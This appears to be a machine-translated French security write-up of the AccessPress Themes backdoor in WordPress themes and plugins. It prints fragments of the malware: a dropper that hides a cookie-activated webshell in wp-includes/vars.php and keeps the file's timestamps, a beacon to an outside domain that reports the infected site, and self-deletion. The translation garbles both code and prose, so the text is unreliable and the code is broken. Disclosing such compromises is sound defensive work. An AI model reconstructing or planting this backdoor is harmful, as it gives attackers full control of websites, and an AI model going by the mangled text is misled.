Themes Access Press trouve la porte arrière dans les Themes et les plug – ins
Ils ont créé un Dropper pour webshell qui permet aux attaquants d’accéder pleinement au site infecté. La burette est dans le fichier initial. Php situé dans le Répertoire d’accueil du plug – in ou du sujet. Lors de l’exécution, installez le webshell basé sur des cookies dans WP includes \/ Vars. Php. Le shell est installé directement devant la fonction WP _ is mobile () appelée WP is mobile Fix (). Cela ne soulève probablement aucun doute de la part de quiconque fait défiler accidentellement un fichier Vars. Php.
Fonction makeinit () {
$b64 = ‘Ba’ Se64 » Décembre \
$b = ‘znvuy3rpb2….. Tskcg = = ‘;
$f = $u Server [‘document u root’] ‘ WP inclut \/ variable. Php ‘;
Si (File _ present ($f)) {
$FP = 0777 et @ fileperms ($f);
$ft = @ filemtime ($f);
$FC = @ file _ get Contents ($f);
Si (strpos ($FC, \
$FC = Str _ replace (‘Function WP is mobile ()’,
B64 $(b $) \
$FC);
Fichier _ put content ($F, $FC);
Toucher (F $, FT);
Chmod (F $, FP $);
}
Renvoie True;
}
Renvoie False;
}
Une fois le shell installé, Dropper téléchargera l’image distante à partir de l’URL par téléphone hxxps:\/\/www.wp-theme-connect.com\/images\/wp-theme.jpg Contient l’URL du site infecté et des informations sur le sujet que le site utilise comme paramètre de requête. Enfin, il supprimera le fichier source de la burette pour éviter d’être détecté à la fin de l’exécution de la demande.
Fonction finishinit () {
Unlink (file);
}
Ajouter une opération (‘admin _ notices’,’ WP notice plug ‘, 20);
Si (! Function _ exists (‘WP notice plug’) {
Fonction WP _ notice plug () {
Echo \
}
}
Register _ shutdown Function (\
Si la chaîne user agent dans la requête est WP _ is mobile et que la requête contient huit cookies spécifiques, webshell lui – même est activé. Il combine les cookies fournis et exécute la charge utile.
$is _ WP mobile = ($u Server [‘http user agent’] = ‘WP is mobile’);
$G = $u cookies;
(count ($g) = = 8 & $is _ WP mobile)?
(QR = $G [33] g [32]) & (IV = $QR (G [78] g [18]) & & nbsp;
($u IV = QR ($G [12] $G [17]) & & & ($u IV = @ IV ($G [10], $u IV ($QR ($G [53])) & & nbsp;
$u IV (): $G;
Nous avons également vu une autre variante de la porte arrière, peut – être plus ancienne, qui est directement intégrée dans le fichier de fonction. Sujet \/ plug – in PHP. Cette variante utilise le même mécanisme pour combiner la charge utile des huit cookies, mais ne filtre pas la chaîne user – agent demandée.
Pour s’assurer que la burette fonctionne, utilisez le fichier principal du plug – in (pour le plug – in) ou le fichier de fonction. Php (pour le sujet) a été modifié en utilisant le Code qui exécute le fichier initial. Php (le cas échéant). Si (IS _ admin () {
Ajouter une action (\
}
Fonction APAP _ plugin check () {
Si (fichier _ exists (\ \ dir \ U U. \
Y compris (dir. \
}
}
Un détail surprenant de l’horodatage des plug – ins endommagés est qu’ils datent tous du début de septembre. La plupart sont des dossiers des 6 et 7 septembre, et certains sont des dossiers des 2 et 3 septembre. Comme pour les thèmes, tous les thèmes ont été compromis le 22 septembre, à l’exception de Access Buddy du 9 septembre.
De plus, l’horodatage dans l’archive zip est très uniforme et presque tous les fichiers ont exactement le même horodatage, à l’exception du fichier plug – in principal modifié et du fichier Dropper ajouté (qui est habituellement imprimé environ 2 – 5 minutes après les autres fichiers de l’archive). Observez l’horodatage des fichiers Zip téléchargés à partir du dépôt WordPress. Cependant, nous avons constaté que la distribution de l’horodatage correspond à l’heure à laquelle le plug – in \/ sujet est réellement mis à jour. La distribution des horodatages dans les archives n’est pas non plus très uniforme, ce qui indique quels fichiers ont été mis à jour dans la version et quels fichiers n’ont pas changé par rapport aux versions précédentes.
Q
L’uesto recommande que les fichiers du site thématique accesspress soient délibérément modifiés après leur publication initiale et qu’ils fassent l’objet d’une action concertée. Le compromis semble se dérouler en deux étapes, l’une pour les plug – ins et l’autre pour les sujets. Chacun d’entre eux a déjà essayé de peaufiner le processus. Notre sondage se concentre uniquement sur les thèmes et les plugins disponibles gratuitement sur le site accesspress themes. Nous supposons que leur problème de paiement anticipé a été affecté de la même façon, mais nous n’avons pas encore étudié ce problème. Si vous avez l’une de ces questions, contactez le support de thème accesspress pour plus de conseils.
Si l’un des sujets suivants est installé sur votre site, nous vous recommandons de migrer vers d’autres sujets dès que possible. Les thèmes accesspress n’ont pas été mis à jour et ont été extraits du dépôt WordPress. Organisation.
Les plug – ins qui n’ont pas de numéro de version dans la colonne Clean n’ont pas été mis à jour et, si possible, nous vous recommandons de les remplacer par d’autres plug – ins.